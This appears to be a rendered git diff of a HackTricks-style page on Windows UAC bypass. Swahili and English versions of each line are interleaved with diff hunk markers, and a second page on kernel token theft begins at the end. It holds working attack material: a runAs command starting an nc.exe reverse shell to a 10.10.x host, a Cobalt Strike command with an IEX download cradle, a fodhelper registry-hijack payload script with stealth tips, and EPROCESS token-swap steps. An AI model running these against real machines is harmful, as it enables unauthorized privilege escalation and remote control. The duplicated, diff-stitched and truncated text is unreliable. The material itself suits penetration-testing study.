[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. Applications have different `integrity` levels, and a program with a **high level** can perform tasks that **could potentially compromise the system**. When UAC is enabled, applications and tasks always **run under the security context of a non-administrator account** unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.
Kwa habari zaidi kuhusu ngazi za integrity:
For more info about integrity levels:
{{#ref}}
../windows-local-privilege-escalation/integrity-levels.md
{{#endref}}
Wakati UAC iko, mtumiaji msimamizi anapewa tokeni 2: tokeni ya kawaida ya mtumiaji, kwa kutekeleza vitendo vya kawaida kwa kiwango cha kawaida, na tokeni moja yenye haki za msimamizi.
When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges.
Ukurasa huu [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) unajadili jinsi UAC inavyofanya kazi kwa kina na unajumuisha mchakato wa kuingia, uzoefu wa mtumiaji, na usanifu wa UAC. Wasimamizi wanaweza kutumia sera za usalama kusanidi jinsi UAC inavyofanya kazi kulingana na shirika lao kwa ngazi ya eneo (kutumia secpol.msc), au kusanidiwa na kusambazwa kupitia Group Policy Objects (GPO) katika mazingira ya Active Directory domain. Mipangilio mbalimbali inajadiliwa kwa undani [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). Kuna mipangilio 10 ya Group Policy inayoweza kuwekwa kwa UAC. Jedwali lifuatalo linatoa maelezo ya ziada:
This [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture. Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:
| Mpangilio wa Group Policy | Kifunguo cha Rejista | Mipangilio ya chaguo-msingi |
| Group Policy Setting | Registry Key | Default Setting |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Imezimwa |
| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Imezimwa |
| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Omba idhini kwa binaries zisizo za Windows |
| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Ombwa taarifa za kuingia kwenye desktop salama |
| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Imewezeshwa (chaguo-msingi kwa home) Imezimwa (chaguo-msingi kwa enterprise) |
| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Imezimwa |
| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Imewezeshwa |
| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Imewezeshwa |
| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Imewezeshwa |
| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | Imewezeshwa |
| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | Enabled |
### UAC Bypass Theory
Baadhi ya programu zinapewa **autoelevated automatically** ikiwa **mtumiaji ni mwanachama** wa **kundi la administrator**. Binaries hizi zina ndani ya _**Manifests**_ chaguo la _**autoElevate**_ lenye thamani _**True**_. Binary pia lazima iwe **imesainiwa na Microsoft**.
Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also.
Mchakato wa auto-elevate mwingi huweka **utendaji kupitia COM objects au RPC servers**, ambao yanaweza kuitwa kutoka kwa michakato inayokimbia kwa integrity ya medium (idhani ya mtumiaji wa kawaida). Kumbuka COM (Component Object Model) na RPC (Remote Procedure Call) ni mbinu ambazo programu za Windows hutumia kuwasiliana na kutekeleza kazi kati ya michakato tofauti. Kwa mfano, **`IFileOperation COM object`** imetengenezwa kushughulikia shughuli za faili (kopi, kufuta, kuhamisha) na inaweza auto-elevate vibali bila ombi.
Many auto-elevate processes expose **functionality via COM objects or RPC servers**, which can be invoked from processes running with medium integrity (regular user-level privileges). Note that COM (Component Object Model) and RPC (Remote Procedure Call) are methods Windows programs use to communicate and execute functions across different processes. For example, **`IFileOperation COM object`** is designed to handle file operations (copying, deleting, moving) and can automatically elevate privileges without a prompt.
Kumbuka kwamba baadhi ya ukaguzi unaweza kufanywa, kama kuangalia ikiwa mchakato ulitendewa kutoka kwa **System32 directory**, ambayo inaweza kupitishwa kwa mfano kwa **kufunya katika explorer.exe** au executable nyingine iliyoko System32.
Note that some checks might be performed, like checking if the process was run from the **System32 directory**, which can be bypassed for example **injecting into explorer.exe** or another System32-located executable.
Njia nyingine ya kupitishwa kwa ukaguzi huu ni **kurekebisha PEB**. Kila mchakato katika Windows una Process Environment Block (PEB), ambayo inajumuisha data muhimu kuhusu mchakato, kama njia ya executable yake. Kwa kurekebisha PEB, mashambulizi wanaweza kuiga (spoof) mahali pa mchakato wao hatari, kuonekana kama inaruka kutoka kwa saraka ya kuaminika (kama system32). Taarifa hii iliyodanganywa inamshawishi COM object auto-elevate vibali bila kumwuliza mtumiaji.
Another way to bypass these checks is to **modify the PEB**. Every process in Windows has a Process Environment Block (PEB), which includes important data about the process, such as its executable path. By modifying the PEB, attackers can fake (spoof) the location of their own malicious process, making it appear to run from a trusted directory (like system32). This spoofed information tricks the COM object into auto-elevating privileges without prompting the user.
Kisha, ili **kupitisha** **UAC** (kuinua kutoka kwa integrity ya **medium** hadi **high**), baadhi ya mashambulizi hutumia aina hizi za binaries kutekeleza **code yoyote** kwa sababu italetea kutekelezwa kutoka kwa mchakato wa integrity ya High.
Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
Unaweza **kuangalia** _**Manifest**_ ya binary kwa kutumia zana _**sigcheck.exe**_ kutoka Sysinternals. (`sigcheck.exe -m <file>`) Na unaweza **kuona** ngazi ya **integrity** ya michakato kwa kutumia _Process Explorer_ au _Process Monitor_ (ya Sysinternals).
You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. (`sigcheck.exe -m <file>`) And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
### Check UAC
### Kagua UAC
Ili kuthibitisha kama UAC imewezeshwa fanya:
To confirm if UAC is enabled do:
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
```
Kama ni **`1`** basi UAC imewezeshwa, ikiwa ni **`0`** au haipo, basi UAC haifanyi kazi.
Ikiwa ni **`1`** basi UAC imewezeshwa, ikiwa ni **`0`** au haipo, basi UAC imezimwa.
Kisha, angalia **ni kiwango gani** kimewekwa:
```
@ -92,15 +92,15 @@ whoami /groups | findstr Level
## UAC bypass
> [!TIP]
> Kumbuka kwamba ikiwa una ufikiaji wa grafiki kwa upande wa mwathiriwa, UAC bypass ni rahisi kwani unaweza kubofya "Yes" unapopokea onyo la UAC
> Kumbuka kwamba ikiwa una ufikiaji wa GUI kwa mwathiriwa, UAC bypass ni rahisi kwa sababu unaweza tu kubofya "Yes" wakati onyo la UAC linapotokea
UAC bypass inahitajika katika hali zifuatazo: **UAC imewashwa, mchakato wako unakimbia katika muktadha wa medium integrity, na mtumiaji wako ni sehemu ya administrators group**.
The UAC bypass inahitajika katika hali ifuatayo: **UAC imewezeshwa, mchakato wako unaendesha katika medium integrity context, na mtumiaji wako ni sehemu ya administrators group**.
Ni muhimu kutaja kwamba ni **ngumu zaidi ku-bypass UAC ikiwa iko katika kiwango cha juu kabisa cha usalama (Always) kuliko ikiwa iko katika mojawapo ya viwango vingine (Default).**
Ni muhimu kutaja kwamba ni **ngumu zaidi kufanya UAC bypass ikiwa iko kwenye kiwango cha juu kabisa cha usalama (Always) kuliko ikiwa iko katika mojawapo ya viwango vingine (Default).**
### UAC imezimwa
### UAC disabled
Ikiwa UAC tayari imezimwa (`ConsentPromptBehaviorAdmin` ni **`0`**) unaweza **execute a reverse shell with admin privileges** (high integrity level) kwa kutumia kitu kama:
Ikiwa UAC tayari imezimwa (`ConsentPromptBehaviorAdmin` is **`0`**) unaweza **kutekeleza reverse shell kwa admin privileges** (high integrity level) kwa kutumia kitu kama:
```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
@ -111,9 +111,9 @@ Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10
- [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
- [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
### **Msingi Sana** UAC "bypass" (upatikanaji kamili wa mfumo wa faili)
### **Msingi Sana** UAC "bypass" (ufikiaji kamili wa mfumo wa faili)
Ikiwa una shell na mtumiaji aliyeko ndani ya kikundi cha Administrators, unaweza **mount the C$** iliyoshirikiwa kupitia SMB (file system) kama drive mpya ndani ya eneo la mfumo na utapata **upatikanaji wa kila kitu ndani ya mfumo wa faili** (hata folda ya nyumbani ya Administrator).
Ikiwa una shell na mtumiaji ambaye yuko ndani ya Administrators group unaweza **mount the C$** shared via SMB (file system) local in a new disk na utakuwa na **ufikiaji kwa kila kitu ndani ya mfumo wa faili** (hata folda ya nyumbani ya Administrator).
> [!WARNING]
> **Inaonekana hila hii haifanyi kazi tena**
@ -126,7 +126,7 @@ dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
### UAC bypass na cobalt strike
Mbinu za Cobalt Strike zitafanya kazi tu ikiwa UAC haijawekwa kwenye kiwango chake cha juu kabisa cha usalama.
Mbinu za Cobalt Strike zitatumika tu ikiwa UAC haijawekwa kwenye kiwango chake cha juu kabisa cha usalama.
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
@ -142,13 +142,14 @@ runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.w
### KRBUACBypass
Nyaraka na zana ziko katika [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
Nyaraka na chombo ziko katika [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
### UAC bypass exploits
[**UACME** ](https://github.com/hfiref0x/UACME) ambayo ni **mkusanyiko** wa kadhaa UAC bypass exploits. Kumbuka kwamba utahitaji **compile UACME using Visual Studio or msbuild**. Ujenzi huo utatengeneza executables kadhaa (kama `Source\Akagi\outout\x64\Debug\Akagi.exe`), utahitaji kujua **ni ipi unayohitaji.**\ Unapaswa **kuwa mwangalifu** kwa sababu baadhi ya bypasses zitaamsha **programu nyingine** ambazo zitatuma **taarifa** kwa **mtumiaji** kwamba kuna kitu kinaendelea.
[**UACME** ](https://github.com/hfiref0x/UACME) ambayo ni **mkusanyiko** wa UAC bypass exploits kadhaa. Kumbuka kwamba utahitaji **compile UACME using visual studio or msbuild**. Mchakato wa compilation utaunda executables kadhaa (kama `Source\Akagi\outout\x64\Debug\Akagi.exe`), utahitaji kujua **which one you need.**\
Unapaswa **kuwa mwangalifu** kwa sababu baadhi ya bypasses zitasababisha **kuamsha programu nyingine** ambazo zitatuma **kuarifu** kwa **mtumiaji** kwamba kuna kitu kinachoendelea.
UACME ina **build version kutoka ambako kila mbinu ilianza kufanya kazi**. Unaweza kutafuta mbinu inayoathiri matoleo yako:
UACME ina **toleo la build ambalo kila mbinu ilianza kufanya kazi**. Unaweza kutafuta mbinu inayohusu matoleo yako:
```
PS C:\> [environment]::OSVersion.Version
@ -156,17 +157,17 @@ Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
```
Pia, kwa kutumia [this](https://en.wikipedia.org/wiki/Windows_10_version_history) page utapata toleo la Windows `1607` kutoka kwa matoleo ya build.
Pia, kwa kutumia [this](https://en.wikipedia.org/wiki/Windows_10_version_history) ukurasa unapata toleo la Windows `1607` kutoka kwa matoleo ya build.
### UAC Bypass fodhelper.exe (Registry hijack)
Binary ya kuaminika `fodhelper.exe` huinuliwa kiotomatiki kwenye Windows za kisasa. Ikitumika, inalenga njia ya rejista ya kila mtumiaji hapa chini bila kuthibitisha verb `DelegateExecute`. Kuweka amri hapo kunaruhusu mchakato wa Medium Integrity (mtumiaji yuko kwenye Administrators) kuanzisha mchakato wa High Integrity bila onyo la UAC.
Binary ya kuaminika `fodhelper.exe` inaongezwa moja kwa moja (auto-elevated) kwenye Windows za kisasa. Inapozinduliwa, huuliza path ya registry ya kila-mtumiaji iliyo hapa chini bila kuthibitisha kitenzi `DelegateExecute`. Kuweka amri hapo kumruhusu mchakato wa Medium Integrity (mtumiaji yuko katika Administrators) kuanzisha mchakato wa High Integrity bila onyo la UAC.
Njia ya rejista inayoulizwa na fodhelper:
Registry path queried by fodhelper:
```
HKCU\Software\Classes\ms-settings\Shell\Open\command
```
Hatua za PowerShell (weka payload yako, kisha trigger):
Hatua za PowerShell (weka payload yako, kisha amsha):
```powershell
# Optional: from a 32-bit shell on 64-bit Windows, spawn a 64-bit PowerShell for stability
C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell -nop -w hidden -c "$PSVersionTable.PSEdition"
@ -186,44 +187,44 @@ Start-Process -FilePath "C:\\Windows\\System32\\fodhelper.exe"
Remove-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open" -Recurse -Force
```
Notes:
- Inafanya kazi wakati mtumiaji wa sasa ni mwanachama wa Administrators na kiwango cha UAC ni default/lenient (si Always Notify na vikwazo vya ziada).
- Tumia njia ya `sysnative` kuanzisha PowerShell ya 64-bit kutoka mchakato wa 32-bit kwenye Windows 64-bit.
- Payload inaweza kuwa amri yoyote (PowerShell, cmd, au njia ya EXE). Epuka UI zinazochochea kusubiri ruhusa kwa ajili ya kimya (stealth).
- Inafanya kazi wakati mtumiaji wa sasa ni mwanachama wa Administrators na kiwango cha UAC ni default/lenient (sio Always Notify yenye vikwazo vya ziada).
- Tumia njia ya `sysnative` kuanzisha PowerShell ya 64-bit kutoka kwenye mchakato wa 32-bit kwenye Windows 64-bit.
- Payload inaweza kuwa amri yoyote (PowerShell, cmd, au njia ya EXE). Epuka kuonyeshwa kwa UIs ili kubaki stealth.
#### More UAC bypass
#### Zaidi ya UAC bypass
**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
**Tekniki zote** zilizotumika hapa kwa ajili ya ku-bypass UAC **zinahitaji** **full interactive shell** na mwathiriwa (shell ya kawaida ya nc.exe haitoshi).
Unaweza kupata kwa kutumia session ya **meterpreter**. Migrate kwenda kwa **process** ambayo ina thamani ya **Session** sawa na **1**:
Unaweza kupata hili kwa kutumia session ya **meterpreter**. Hamia kwenye **process** ambayo ina thamani ya **Session** sawa na **1**:
![](<../../images/image (863).png>)
(_explorer.exe_ inapaswa kufanya kazi)
### UAC Bypass with GUI
### UAC Bypass na GUI
Ikiwa una ufikiaji wa **GUI unaweza tu kukubali UAC prompt** unapoupata, kwa hakika huhitaji bypass. Hivyo, kupata ufikiaji wa GUI kutakuwezesha kupita UAC.
Kama una ufikiaji wa **GUI** unaweza kukubali tu **UAC prompt** unapoipata; kwa hivyo hauhitaji kweli bypass. Kupata ufikiaji wa GUI kutakuwezesha bypass UAC.
Zaidi ya hayo, ikiwa unapata session ya GUI ambayo mtu alikuwa anaitumia (inawezekana kupitia RDP) kuna **zana baadhi zitakazoendeshwa kama administrator** ambapo unaweza **kufanya** **cmd** kwa mfano **as admin** moja kwa moja bila kuonyeshwa tena na UAC kama [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif). Hii inaweza kuwa kidogo zaidi **stealthy**.
Zaidi ya hayo, ikiwa unapata session ya GUI ambayo mtu alikuwa akitumia (pengine kupitia RDP) kuna **vifaa vichache vitakavyokuwa vikiendesha kama administrator** ambavyo unaweza **kuitumia** **cmd** kwa mfano **kama admin** moja kwa moja bila kuulizwa tena na UAC kama [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif). Hii inaweza kuwa kidogo **stealthy**.
### Noisy brute-force UAC bypass
Ikiwa hukujali kuhusu kelele unaweza daima **kimbia kitu kama** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) kinachotaka kuinua ruhusa hadi mtumiaji atakubali.
Ikiwa hujali kuhusu kusababisha sauti/kuonekana unaweza daima **kuendesha kitu kama** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) kinachomwomba mtumiaji kuinua ruhusa hadi mtumiaji anapokubali.
### Your own bypass - Basic UAC bypass methodology
### Bypass yako mwenyewe - Mbinu msingi ya UAC bypass
Ikiwa utaangalia **UACME** utagundua kwamba **uwezekano mkubwa UAC bypasses hutumia udhaifu wa Dll Hijacking** (hasa kuandika dll hatari kwenye _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/index.html).
Ikiangalia **UACME** utaona kwamba **most UAC bypasses abuse a Dll Hijacking vulnerability** (hasa kuandika dll mbaya kwenye _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/index.html).
1. Tafuta binary ambayo ita **autoelevate** (angalia kwamba inapoendeshwa inaendesha kwenye high integrity level).
2. Kwa kutumia procmon tafuta matukio ya "**NAME NOT FOUND**" ambayo yanaweza kuwa dhaifu kwa **DLL Hijacking**.
3. Huenda utahitaji **kuandika** DLL ndani ya baadhi ya **protected paths** (kama C:\Windows\System32) ambapo huna ruhusa ya kuandika. Unaweza kupita hili kwa kutumia:
1. **wusa.exe**: Windows 7,8 na 8.1. Inaruhusu kutoa yaliyomo ya CAB ndani ya protected paths (kwa sababu zana hii inaendeshwa kutoka high integrity level).
1. Tafuta binary itakayofanya **autoelevate** (hakikisha kwamba inapotekelezwa inaendesha kwa high integrity level).
2. Kwa procmon tafuta matukio ya "**NAME NOT FOUND**" ambayo yanaweza kuwa hatarini kwa **DLL Hijacking**.
3. Huenda utahitaji **kuandika** DLL ndani ya baadhi ya **protected paths** (kama C:\Windows\System32) ambapo huna ruhusa za kuandika. Unaweza ku-bypass hili kwa kutumia:
1. **wusa.exe**: Windows 7,8 and 8.1. Inaruhusu kutoa yaliyomo ya faili la CAB ndani ya protected paths (kwa sababu zana hii inaendeshwa kutoka high integrity level).
2. **IFileOperation**: Windows 10.
4. Andaa **script** ili kunakili DLL yako ndani ya protected path na uendeshe binary dhaifu na autoelevated.
4. Tayarisha **script** kunakili DLL yako ndani ya protected path na kuendesha binary yenye udhaifu na inayoautoelevate.
### Another UAC bypass technique
Inajumuisha kuangalia kama **autoElevated binary** inajaribu **kusoma** kutoka kwa **registry** jina/nafasi ya **binary** au **command** itakayotekelezwa (hii inakuwa ya kuvutia zaidi ikiwa binary inatafuta taarifa hii ndani ya **HKCU**).
Inahusisha kuangalia kama **autoElevated binary** inajaribu **read** kutoka kwa **registry** jina/path ya **binary** au **command** itakayotekelezwa (hii ni ya kuvutia zaidi ikiwa binary inatafuta taarifa hii ndani ya **HKCU**).
## References
- [HTB: Rainbow SEH overflow to RCE over HTTP (0xdf) fodhelper UAC bypass steps](https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html)

692
src/windows-hardening/windows-local-privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

46
src/windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md
View File

@ -4,35 +4,35 @@
## Muhtasari
Ikiwa driver dhaifu ina IOCTL inayomruhusu mshambuliaji primitives za arbitrary kernel read na/au write, kuinua haki hadi NT AUTHORITY\SYSTEM mara nyingi inaweza kufanikiwa kwa kuiba token ya SYSTEM. Mbinu hii inakopa pointer ya Token kutoka kwenye EPROCESS ya mchakato wa SYSTEM na kuiweka kwenye EPROCESS ya mchakato wako wa sasa.
Ikiwa driver iliyo hatarini ina IOCTL inayomruhusu mshambuliaji arbitrary kernel read and/or write primitives, kuinua haki hadi NT AUTHORITY\SYSTEM mara nyingi hufanikiwa kwa kuiba SYSTEM access token. Mbinu inakopa pointer ya Token kutoka EPROCESS ya mchakato wa SYSTEM na kuiweka kwenye EPROCESS ya mchakato wa sasa.
Kwa nini inafanya kazi:
- Kila mchakato una muundo wa EPROCESS ambao una (miongoni mwa sehemu nyingine) Token (kwa kweli EX_FAST_REF kuelekea kitu cha token).
- Mchakato wa SYSTEM (PID 4) una token yenye ruhusa zote zikiwa zimeteuliwa.
- Kubadilisha EPROCESS.Token ya mchakato wako wa sasa na pointer ya token ya SYSTEM hufanya mchakato wako uendelee kuendesha kama SYSTEM mara moja.
- Kila mchakato una muundo wa EPROCESS ambao una (miongoni mwa mashamba mengine) Token (kibinadamu ni EX_FAST_REF kwa token object).
- Mchakato wa SYSTEM (PID 4) una token yenye haki zote zikiwa zimewezeshwa.
- Kubadilisha EPROCESS.Token ya mchakato wa sasa na pointer ya token ya SYSTEM hufanya mchakato wa sasa uendeshe kama SYSTEM mara moja.
> Offsets katika EPROCESS zinatofautiana kati ya matoleo ya Windows. Zidhibitio kwa njia ya dynamic (symbols) au tumia constants maalum kwa toleo. Pia kumbuka kuwa EPROCESS.Token ni EX_FAST_REF (bita 3 za chini ni flag za reference count).
> Offsets kwenye EPROCESS zinatofautiana kati ya matoleo ya Windows. Ziagilie kwa njia ya dynamic (symbols) au tumia constants za toleo maalum. Pia kumbuka kwamba EPROCESS.Token ni EX_FAST_REF (viga vya chini 3 ni bendera za reference count).
## Hatua za juu
1) Pata base ya ntoskrnl.exe na tatua anwani ya PsInitialSystemProcess.
- Kutoka user mode, tumia NtQuerySystemInformation(SystemModuleInformation) au EnumDeviceDrivers kupata base za drivers zilizo load.
- Ongeza offset ya PsInitialSystemProcess (kutoka symbols/reversing) kwenye kernel base kupata anwani yake.
2) Soma pointer kwenye PsInitialSystemProcess → hii ni kernel pointer kuelekea EPROCESS ya SYSTEM.
3) Kutoka EPROCESS ya SYSTEM, soma UniqueProcessId na ActiveProcessLinks offsets ili kuvuka orodha ya double linked list ya miundo ya EPROCESS (ActiveProcessLinks.Flink/Blink) hadi utakapopata EPROCESS ambayo UniqueProcessId yake ni sawa na GetCurrentProcessId(). Hifadhi yote:
1) Pata ntoskrnl.exe base na ufute anwani ya PsInitialSystemProcess.
- Kutoka user mode, tumia NtQuerySystemInformation(SystemModuleInformation) au EnumDeviceDrivers kupata driver bases zilizosomwa.
- Ongeza offset ya PsInitialSystemProcess (kutokana na symbols/reversing) kwenye kernel base kupata anwani yake.
2) Soma pointer kwenye PsInitialSystemProcess → hii ni pointer ya kernel kwenda EPROCESS ya SYSTEM.
3) Kutoka EPROCESS ya SYSTEM, soma offsets za UniqueProcessId na ActiveProcessLinks ili kupitia linked list ya EPROCESS (ActiveProcessLinks.Flink/Blink) hadi utakapopata EPROCESS ambayo UniqueProcessId inalingana na GetCurrentProcessId(). Hifadhi zote:
- EPROCESS_SYSTEM (kwa SYSTEM)
- EPROCESS_SELF (kwa mchakato wa sasa)
4) Soma thamani ya token ya SYSTEM: Token_SYS = *(EPROCESS_SYSTEM + TokenOffset).
- Futa bit 3 za chini: Token_SYS_masked = Token_SYS & ~0xF (kawaida ~0xF au ~0x7 kulingana na build; kwenye x64 bit 3 za chini zinatumika — mask 0xFFFFFFFFFFFFFFF8).
5) Chaguo A (kawaida): Hifadhi bit 3 za chini kutoka token yako ya sasa na ziweke kwenye pointer ya SYSTEM ili kuweka reference count iliyojengwa iwe thabiti.
- Ondoa bits za chini 3: Token_SYS_masked = Token_SYS & ~0xF (kwa kawaida ~0xF au ~0x7 kutegemea build; kwenye x64 bits za chini 3 zinatumika — 0xFFFFFFFFFFFFFFF8 mask).
5) Chaguo A (kawaida): Hifadhi bits za chini 3 kutoka token yako ya sasa na uziunganishe kwenye pointer ya SYSTEM ili kuweka reference count iliyojengwa kuwa thabiti.
- Token_ME = *(EPROCESS_SELF + TokenOffset)
- Token_NEW = (Token_SYS_masked | (Token_ME & 0x7))
6) Andika Token_NEW kurudi ndani ya (EPROCESS_SELF + TokenOffset) kwa kutumia kernel write primitive yako.
7) Mchakato wako wa sasa sasa ni SYSTEM. Hiari anzisha cmd.exe mpya au powershell.exe kuthibitisha.
6) Andika Token_NEW tena kwenye (EPROCESS_SELF + TokenOffset) ukitumia kernel write primitive yako.
